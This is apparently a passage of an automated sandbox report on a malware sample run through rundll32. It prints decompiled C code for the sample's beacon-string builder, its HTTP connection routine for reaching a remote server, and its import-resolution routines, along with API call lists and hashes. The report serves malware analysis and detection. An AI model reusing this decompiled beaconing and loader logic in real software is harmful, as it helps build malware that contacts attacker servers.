                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Section$CreateViewmemset
                                            • String ID:
                                            • API String ID: 2533685722-0
                                            • Opcode ID: d9d64a364fb024a8bbd88631a5c423510446b5b41a7fba1de82a375655f3b97f
                                            • Instruction ID: c78791dfdba6af43690801b2cd273a63df905d45e949f081e91eeabf47ff089a
                                            • Opcode Fuzzy Hash: d9d64a364fb024a8bbd88631a5c423510446b5b41a7fba1de82a375655f3b97f
                                            • Instruction Fuzzy Hash: C3211DB5D00209AFDB11DFA9C8849DEFBB9FF48354F10887AE615F7210D731AA458BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetProcAddress.KERNEL32(?), ref: 05801CA1
                                            • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 05801CC3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressMemory64ProcReadVirtualWow64
                                            • String ID:
                                            • API String ID: 752694512-0
                                            • Opcode ID: fcd8a0b2c70e01adf9c2c0e1522e481e139471e724b4af1dcb558d6ebca42b21
                                            • Instruction ID: 332f9581b0b4582b79a642e7ddb7fa6c5bfc6e42d135aacbe6113718cdff740e
                                            • Opcode Fuzzy Hash: fcd8a0b2c70e01adf9c2c0e1522e481e139471e724b4af1dcb558d6ebca42b21
                                            • Instruction Fuzzy Hash: F9F04975610109BFCB119F8ADC49C9EBFBAFB88320B108119FD04C2220DB31E990DB20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E049F3A9C(void** __esi, PVOID* _a4) {
                                            				long _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				long _t13;
                                            
                                            				_v16 = 0;
                                            				asm("stosd");
                                            				_v8 = 0;
                                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                            				if(_t13 < 0) {
                                            					_push(_t13);
                                            					return __esi[6]();
                                            				}
                                            				return 0;
                                            			}

                                            APIs
                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,049F2649,00000002,00000000,?,?,00000000,?,?,049F2649,00000000), ref: 049F3AC9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: SectionView
                                            • String ID:
                                            • API String ID: 1323581903-0
                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                            • Instruction ID: ef985a48e460dc9d65110b17b5a2f9ae26a6e517846d3610bb3a071e38c88a1e
                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                            • Instruction Fuzzy Hash: BAF012B5A0420CBFDB119FA5CC85C9FBBBDEB44355B104979B652E1190D630AE089B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,05829420), ref: 05815DB4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID:
                                            • API String ID: 1778838933-0
                                            • Opcode ID: ca3caaab4a1a670ed599014710dea2b42f27382c0a531038e87079528e5fa62e
                                            • Instruction ID: 73c0ced0f09e10d1e46f60451f32fc631a5f92abf797ab2dcb319f187cd4334c
                                            • Opcode Fuzzy Hash: ca3caaab4a1a670ed599014710dea2b42f27382c0a531038e87079528e5fa62e
                                            • Instruction Fuzzy Hash: 48F034313001299F8B20DE5ACC89EAABBADFB45794B218164ED01DB260D620EE45CBE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 68%
                                            			E049F636D(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                                            				intOrPtr _v0;
                                            				intOrPtr _v4;
                                            				void* _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v52;
                                            				void* __ecx;
                                            				void* __edi;
                                            				long _t29;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				intOrPtr _t32;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				void* _t37;
                                            				intOrPtr _t38;
                                            				int _t41;
                                            				void* _t42;
                                            				intOrPtr _t46;
                                            				intOrPtr _t47;
                                            				intOrPtr _t54;
                                            				intOrPtr _t58;
                                            				intOrPtr* _t60;
                                            				void* _t61;
                                            				intOrPtr _t66;
                                            				intOrPtr _t72;
                                            				intOrPtr _t75;
                                            				intOrPtr _t78;
                                            				int _t81;
                                            				intOrPtr _t82;
                                            				int _t85;
                                            				intOrPtr _t87;
                                            				int _t90;
                                            				intOrPtr _t92;
                                            				int _t95;
                                            				intOrPtr* _t97;
                                            				intOrPtr* _t98;
                                            				void* _t99;
                                            				void* _t103;
                                            				void* _t104;
                                            				void* _t105;
                                            				intOrPtr _t106;
                                            				void* _t108;
                                            				int _t109;
                                            				void* _t110;
                                            				void* _t111;
                                            				void* _t113;
                                            				void* _t114;
                                            				void* _t116;
                                            
                                            				_t103 = __edx;
                                            				_t29 = __eax;
                                            				_t113 = _a20;
                                            				_v4 = 8;
                                            				if(__eax == 0) {
                                            					_t29 = GetTickCount();
                                            				}
                                            				_t30 =  *0x49fa018; // 0x6a85f48
                                            				asm("bswap eax");
                                            				_t31 =  *0x49fa014; // 0x3a87c8cd
                                            				asm("bswap eax");
                                            				_t32 =  *0x49fa010; // 0xd8d2f808
                                            				asm("bswap eax");
                                            				_t33 =  *0x49fa00c; // 0x81762942
                                            				asm("bswap eax");
                                            				_t34 =  *0x49fa348; // 0x57d5a8
                                            				_t3 = _t34 + 0x49fb633; // 0x74666f73
                                            				_t109 = wsprintfA(_t113, _t3, 2, 0x3d173, _t33, _t32, _t31, _t30,  *0x49fa02c,  *0x49fa004, _t29);
                                            				_t37 = E049F3F1E();
                                            				_t38 =  *0x49fa348; // 0x57d5a8
                                            				_t4 = _t38 + 0x49fb673; // 0x74707526
                                            				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                                            				_t116 = _t114 + 0x38;
                                            				_t110 = _t109 + _t41;
                                            				if(_a24 != 0) {
                                            					_t92 =  *0x49fa348; // 0x57d5a8
                                            					_t8 = _t92 + 0x49fb67e; // 0x732526
                                            					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                                            					_t116 = _t116 + 0xc;
                                            					_t110 = _t110 + _t95; // executed
                                            				}
                                            				_t42 = E049F1567(_t99); // executed
                                            				_t104 = _t42;
                                            				if(_t104 != 0) {
                                            					_t87 =  *0x49fa348; // 0x57d5a8
                                            					_t10 = _t87 + 0x49fb8d4; // 0x736e6426
                                            					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                                            					_t116 = _t116 + 0xc;
                                            					_t110 = _t110 + _t90;
                                            					HeapFree( *0x49fa2d8, 0, _t104);
                                            				}
                                            				_t105 = E049F3268();
                                            				if(_t105 != 0) {
                                            					_t82 =  *0x49fa348; // 0x57d5a8
                                            					_t12 = _t82 + 0x49fb8dc; // 0x6f687726
                                            					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                                            					_t116 = _t116 + 0xc;
                                            					_t110 = _t110 + _t85;
                                            					HeapFree( *0x49fa2d8, 0, _t105);
                                            				}
                                            				_t106 =  *0x49fa3cc; // 0x4f795b0
                                            				_a24 = E049F5D1C(0x49fa00a, _t106 + 4);
                                            				_t46 =  *0x49fa370; // 0x0
                                            				if(_t46 != 0) {
                                            					_t78 =  *0x49fa348; // 0x57d5a8
                                            					_t15 = _t78 + 0x49fb8b6; // 0x3d736f26
                                            					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                                            					_t116 = _t116 + 0xc;
                                            					_t110 = _t110 + _t81;
                                            				}
                                            				_t47 =  *0x49fa36c; // 0x0
                                            				if(_t47 != 0) {
                                            					_t75 =  *0x49fa348; // 0x57d5a8
                                            					_t17 = _t75 + 0x49fb88d; // 0x3d706926
                                            					wsprintfA(_t110 + _t113, _t17, _t47);
                                            				}
                                            				if(_a24 != 0) {
                                            					_t108 = RtlAllocateHeap( *0x49fa2d8, 0, 0x800);
                                            					if(_t108 != 0) {
                                            						E049F3950(GetTickCount());
                                            						_t54 =  *0x49fa3cc; // 0x4f795b0
                                            						__imp__(_t54 + 0x40);
                                            						asm("lock xadd [eax], ecx");
                                            						_t58 =  *0x49fa3cc; // 0x4f795b0
                                            						__imp__(_t58 + 0x40);
                                            						_t60 =  *0x49fa3cc; // 0x4f795b0
                                            						_t61 = E049F3739(1, _t103, _t113,  *_t60); // executed
                                            						_t111 = _t61;
                                            						asm("lock xadd [eax], ecx");
                                            						if(_t111 != 0) {
                                            							StrTrimA(_t111, 0x49f928c);
                                            							_push(_t111);
                                            							_t66 = E049F3970();
                                            							_a12 = _t66;
                                            							if(_t66 != 0) {
                                            								_t97 = __imp__;
                                            								 *_t97(_t111, _v0);
                                            								 *_t97(_t108, _v4);
                                            								_t98 = __imp__;
                                            								 *_t98(_t108, _v0);
                                            								 *_t98(_t108, _t111);
                                            								_t72 = E049F5347(0xffffffffffffffff, _t108, _v24, _v20); // executed
                                            								_v52 = _t72;
                                            								if(_t72 != 0 && _t72 != 0x10d2) {
                                            									E049F3F62();
                                            								}
                                            								HeapFree( *0x49fa2d8, 0, _v16);
                                            							}
                                            							HeapFree( *0x49fa2d8, 0, _t111);
                                            						}
                                            						RtlFreeHeap( *0x49fa2d8, 0, _t108); // executed
                                            					}
                                            					HeapFree( *0x49fa2d8, 0, _a16);
                                            				}
                                            				RtlFreeHeap( *0x49fa2d8, 0, _t113); // executed
                                            				return _a4;
                                            			}

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 049F6383
                                            • wsprintfA.USER32 ref: 049F63D0
                                            • wsprintfA.USER32 ref: 049F63ED
                                            • wsprintfA.USER32 ref: 049F640F
                                            • wsprintfA.USER32 ref: 049F6432
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F6442
                                            • wsprintfA.USER32 ref: 049F6464
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F6474
                                            • wsprintfA.USER32 ref: 049F64AB
                                            • wsprintfA.USER32 ref: 049F64CB
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F64E8
                                            • GetTickCount.KERNEL32 ref: 049F64F8
                                            • RtlEnterCriticalSection.NTDLL(04F79570), ref: 049F650C
                                            • RtlLeaveCriticalSection.NTDLL(04F79570), ref: 049F652A
                                              • Part of subcall function 049F3739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,75BCC740,?,?,049F653D,?,04F795B0), ref: 049F3764
                                              • Part of subcall function 049F3739: lstrlen.KERNEL32(?,?,?,049F653D,?,04F795B0), ref: 049F376C
                                              • Part of subcall function 049F3739: strcpy.NTDLL ref: 049F3783
                                              • Part of subcall function 049F3739: lstrcat.KERNEL32(00000000,?), ref: 049F378E
                                              • Part of subcall function 049F3739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F37AB
                                            • StrTrimA.SHLWAPI(00000000,049F928C,?,04F795B0), ref: 049F655C
                                              • Part of subcall function 049F3970: lstrlen.KERNEL32(04F79B90,00000000,00000000,75BCC740,049F6568,00000000), ref: 049F3980
                                              • Part of subcall function 049F3970: lstrlen.KERNEL32(?), ref: 049F3988
                                              • Part of subcall function 049F3970: lstrcpy.KERNEL32(00000000,04F79B90), ref: 049F399C
                                              • Part of subcall function 049F3970: lstrcat.KERNEL32(00000000,?), ref: 049F39A7
                                            • lstrcpy.KERNEL32(00000000,?), ref: 049F657B
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 049F6582
                                            • lstrcat.KERNEL32(00000000,?), ref: 049F658F
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 049F6593
                                              • Part of subcall function 049F5347: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76CC81D0), ref: 049F53F9
                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 049F65C3
                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049F65D2
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,04F795B0), ref: 049F65E1
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F65F3
                                            • RtlFreeHeap.NTDLL(00000000,?), ref: 049F6602
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                            • String ID:
                                            • API String ID: 1892477351-0
                                            • Opcode ID: 9789e01be6eda3c2db08622be0004bd28f4a40b75b1e190928210846effa017b
                                            • Instruction ID: 568921d54b8e3fda9e6e193014d18d3c415d7d818042d7599c735b0530788f05
                                            • Opcode Fuzzy Hash: 9789e01be6eda3c2db08622be0004bd28f4a40b75b1e190928210846effa017b
                                            • Instruction Fuzzy Hash: 69718FB1208201AFD7219BA4EC48F9A3BE8EB89714F180134FA09D7260DB7DFD45DB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05813ED5), ref: 058044F7
                                            • RtlDeleteCriticalSection.NTDLL(05829400), ref: 0580452A
                                            • RtlDeleteCriticalSection.NTDLL(05829420), ref: 05804531
                                            • ReleaseMutex.KERNEL32(000005A8,00000000,?,?,?,05813ED5), ref: 0580455A
                                            • CloseHandle.KERNEL32(?,?,05813ED5), ref: 05804566
                                            • ResetEvent.KERNEL32(00000000,00000000,?,?,?,05813ED5), ref: 05804572
                                            • CloseHandle.KERNEL32(?,?,05813ED5), ref: 0580457E
                                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05813ED5), ref: 05804584
                                            • SleepEx.KERNEL32(00000064,00000001,?,?,05813ED5), ref: 05804598
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,05813ED5), ref: 058045BC
                                            • RtlRemoveVectoredExceptionHandler.NTDLL(056F05B8), ref: 058045F2
                                            • SleepEx.KERNEL32(00000064,00000001,?,?,05813ED5), ref: 0580460E
                                            • FindCloseChangeNotification.KERNEL32(05D7F2C0,?,?,05813ED5), ref: 05804637
                                            • LocalFree.KERNEL32(?,?,05813ED5), ref: 05804647
                                              • Part of subcall function 058074F5: GetVersion.KERNEL32(?,?,76CDF720,?,058044E6,00000000,?,?,?,05813ED5), ref: 05807519
                                              • Part of subcall function 058074F5: GetModuleHandleA.KERNEL32(?,05D797B5,?,76CDF720,?,058044E6,00000000,?,?,?,05813ED5), ref: 05807536
                                              • Part of subcall function 058074F5: GetProcAddress.KERNEL32(00000000), ref: 0580753D
                                              • Part of subcall function 05809A58: RtlEnterCriticalSection.NTDLL(05829420), ref: 05809A62
                                              • Part of subcall function 05809A58: RtlLeaveCriticalSection.NTDLL(05829420), ref: 05809A9E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSectionSleep$CloseHandle$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
                                            • String ID:
                                            • API String ID: 1047430009-0
                                            • Opcode ID: a5cc9366f724928b5e6514b4ed533f73cb0a9bad2d2b981cddf689a2319d989d
                                            • Instruction ID: 55cd2d489713b47cae398237238678a03a8f67391e0744a0f9c9f025cad257ac
                                            • Opcode Fuzzy Hash: a5cc9366f724928b5e6514b4ed533f73cb0a9bad2d2b981cddf689a2319d989d
                                            • Instruction Fuzzy Hash: AA413B31790211ABEF70BF67EC8AA557FA9BB40610B069015FE15D72E0DFB5EC80CA61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 92%
                                            			E049F7A71(void* __eax, void* __ecx, long __esi, char* _a4) {
                                            				void _v8;
                                            				long _v12;
                                            				void _v16;
                                            				void* _t34;
                                            				void* _t38;
                                            				void* _t40;
                                            				int _t53;
                                            				char* _t56;
                                            				long _t57;
                                            				void* _t58;
                                            				intOrPtr _t59;
                                            				long _t65;
                                            
                                            				_t65 = __esi;
                                            				_t58 = __ecx;
                                            				_v16 = 0xea60;
                                            				__imp__( *(__esi + 4));
                                            				_v12 = __eax + __eax;
                                            				_t56 = E049F4DF6(__eax + __eax + 1);
                                            				if(_t56 != 0) {
                                            					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
                                            					if(_t53 == 0) {
                                            						E049F4C73(_t56);
                                            					} else {
                                            						E049F4C73( *(__esi + 4));
                                            						 *(__esi + 4) = _t56;
                                            					}
                                            				}
                                            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                            				 *(_t65 + 0x10) = _t34;
                                            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E049F7A06) == 0xffffffff) {
                                            					L15:
                                            					return GetLastError();
                                            				} else {
                                            					ResetEvent( *(_t65 + 0x1c));
                                            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                                            					 *(_t65 + 0x14) = _t38;
                                            					if(_t38 != 0 || GetLastError() == 0x3e5 && E049F3A6F( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                            						_t59 =  *0x49fa348; // 0x57d5a8
                                            						_t15 = _t59 + 0x49fb743; // 0x544547
                                            						_v8 = 0x84404000;
                                            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                                            						 *(_t65 + 0x18) = _t40;
                                            						if(_t40 == 0) {
                                            							goto L15;
                                            						}
                                            						_t57 = 4;
                                            						_v12 = _t57;
                                            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                            							_v8 = _v8 | 0x00000100;
                                            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                            						}
                                            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                            							goto L15;
                                            						} else {
                                            							return 0;
                                            						}
                                            					} else {
                                            						goto L15;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • lstrlen.KERNEL32(?,00000008,76C84D40), ref: 049F7A83
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 049F7AA6
                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 049F7ACE
                                            • InternetSetStatusCallback.WININET(00000000,049F7A06), ref: 049F7AE5
                                            • ResetEvent.KERNEL32(?), ref: 049F7AF7
                                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 049F7B0A
                                            • GetLastError.KERNEL32 ref: 049F7B17
                                            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 049F7B5D
                                            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 049F7B7B
                                            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 049F7B9C
                                            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 049F7BA8
                                            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 049F7BB8
                                            • GetLastError.KERNEL32 ref: 049F7BC2
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                            • String ID:
                                            • API String ID: 2290446683-0
                                            • Opcode ID: 8edd8795ee5044d6cd2946b9d12d04c9f82a9fc076744050c5ac3204d3de65ec
                                            • Instruction ID: 020ea4d43091cd6fc5b129d5f9b6acb3017061defc4960d8ce5f04c96537ef45
                                            • Opcode Fuzzy Hash: 8edd8795ee5044d6cd2946b9d12d04c9f82a9fc076744050c5ac3204d3de65ec
                                            • Instruction Fuzzy Hash: B7417B71600604BFDB319FA5DC48EAB7FBDEB86705F148979F606E2190E774AA04CB20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 51%
                                            			E049F7EB5(long _a4, long _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				LONG* _v28;
                                            				long _v40;
                                            				long _v44;
                                            				long _v48;
                                            				CHAR* _v52;
                                            				long _v56;
                                            				CHAR* _v60;
                                            				long _v64;
                                            				signed int* _v68;
                                            				char _v72;
                                            				signed int _t76;
                                            				signed int _t80;
                                            				signed int _t81;
                                            				intOrPtr* _t82;
                                            				intOrPtr* _t83;
                                            				intOrPtr* _t85;
                                            				intOrPtr* _t90;
                                            				intOrPtr* _t95;
                                            				intOrPtr* _t98;
                                            				struct HINSTANCE__* _t99;
                                            				void* _t102;
                                            				intOrPtr* _t104;
                                            				void* _t115;
                                            				long _t116;
                                            				void _t125;
                                            				void* _t131;
                                            				signed short _t133;
                                            				struct HINSTANCE__* _t138;
                                            				signed int* _t139;
                                            
                                            				_t139 = _a4;
                                            				_v28 = _t139[2] + 0x49f0000;
                                            				_t115 = _t139[3] + 0x49f0000;
                                            				_t131 = _t139[4] + 0x49f0000;
                                            				_v8 = _t139[7];
                                            				_v60 = _t139[1] + 0x49f0000;
                                            				_v16 = _t139[5] + 0x49f0000;
                                            				_v64 = _a8;
                                            				_v72 = 0x24;
                                            				_v68 = _t139;
                                            				_v56 = 0;
                                            				asm("stosd");
                                            				_v48 = 0;
                                            				_v44 = 0;
                                            				_v40 = 0;
                                            				if(( *_t139 & 0x00000001) == 0) {
                                            					_a8 =  &_v72;
                                            					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                            					return 0;
                                            				}
                                            				_t138 =  *_v28;
                                            				_t76 = _a8 - _t115 >> 2 << 2;
                                            				_t133 =  *(_t131 + _t76);
                                            				_a4 = _t76;
                                            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                            				_v56 = _t80;
                                            				_t81 = _t133 + 0x49f0002;
                                            				if(_t80 == 0) {
                                            					_t81 = _t133 & 0x0000ffff;
                                            				}
                                            				_v52 = _t81;
                                            				_t82 =  *0x49fa1c0; // 0x0
                                            				_t116 = 0;
                                            				if(_t82 == 0) {
                                            					L6:
                                            					if(_t138 != 0) {
                                            						L18:
                                            						_t83 =  *0x49fa1c0; // 0x0
                                            						_v48 = _t138;
                                            						if(_t83 != 0) {
                                            							_t116 =  *_t83(2,  &_v72);
                                            						}
                                            						if(_t116 != 0) {
                                            							L32:
                                            							 *_a8 = _t116;
                                            							L33:
                                            							_t85 =  *0x49fa1c0; // 0x0
                                            							if(_t85 != 0) {
                                            								_v40 = _v40 & 0x00000000;
                                            								_v48 = _t138;
                                            								_v44 = _t116;
                                            								 *_t85(5,  &_v72);
                                            							}
                                            							return _t116;
                                            						} else {
                                            							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                            								L27:
                                            								_t116 = GetProcAddress(_t138, _v52);
                                            								if(_t116 == 0) {
                                            									_v40 = GetLastError();
                                            									_t90 =  *0x49fa1bc; // 0x0
                                            									if(_t90 != 0) {
                                            										_t116 =  *_t90(4,  &_v72);
                                            									}
                                            									if(_t116 == 0) {
                                            										_a4 =  &_v72;
                                            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                            										_t116 = _v44;
                                            									}
                                            								}
                                            								goto L32;
                                            							} else {
                                            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                            									_t116 =  *(_a4 + _v16);
                                            									if(_t116 != 0) {
                                            										goto L32;
                                            									}
                                            								}
                                            								goto L27;
                                            							}
                                            						}
                                            					}
                                            					_t98 =  *0x49fa1c0; // 0x0
                                            					if(_t98 == 0) {
                                            						L9:
                                            						_t99 = LoadLibraryA(_v60); // executed
                                            						_t138 = _t99;
                                            						if(_t138 != 0) {
                                            							L13:
                                            							if(InterlockedExchange(_v28, _t138) == _t138) {
                                            								FreeLibrary(_t138);
                                            							} else {
                                            								if(_t139[6] != 0) {
                                            									_t102 = LocalAlloc(0x40, 8);
                                            									if(_t102 != 0) {
                                            										 *(_t102 + 4) = _t139;
                                            										_t125 =  *0x49fa1b8; // 0x0
                                            										 *_t102 = _t125;
                                            										 *0x49fa1b8 = _t102;
                                            									}
                                            								}
                                            							}
                                            							goto L18;
                                            						}
                                            						_v40 = GetLastError();
                                            						_t104 =  *0x49fa1bc; // 0x0
                                            						if(_t104 == 0) {
                                            							L12:
                                            							_a8 =  &_v72;
                                            							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                            							return _v44;
                                            						}
                                            						_t138 =  *_t104(3,  &_v72);
                                            						if(_t138 != 0) {
                                            							goto L13;
                                            						}
                                            						goto L12;
                                            					}
                                            					_t138 =  *_t98(1,  &_v72);
                                            					if(_t138 != 0) {
                                            						goto L13;
                                            					}
                                            					goto L9;
                                            				}
                                            				_t116 =  *_t82(0,  &_v72);
                                            				if(_t116 != 0) {
                                            					goto L33;
                                            				}
                                            				goto L6;
                                            			}

                                            APIs
                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 049F7F2E
                                            • LoadLibraryA.KERNEL32(?), ref: 049F7FAB
                                            • GetLastError.KERNEL32 ref: 049F7FB7
                                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 049F7FEA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                            • String ID: $
                                            • API String ID: 948315288-3993045852
                                            • Opcode ID: 1f88ea66679fb4088665fb9997fc09b5fae3283e15fd55d96017d71bf55a8f43
